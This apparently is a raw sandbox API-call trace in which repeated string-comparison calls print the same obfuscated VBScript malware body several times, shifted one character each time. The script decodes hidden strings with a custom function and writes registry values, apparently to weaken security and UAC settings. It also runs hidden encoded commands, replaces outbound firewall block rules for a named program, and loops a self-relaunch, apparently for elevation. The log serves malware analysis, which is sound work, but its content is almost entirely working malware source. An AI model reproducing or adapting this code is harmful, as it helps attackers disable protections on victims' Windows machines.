bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.316] wcsncmp (_String1="End Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.316] wcsncmp (_String1="nd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.316] wcsncmp (_String1="d Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.316] wcsncmp (_String1=" Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false 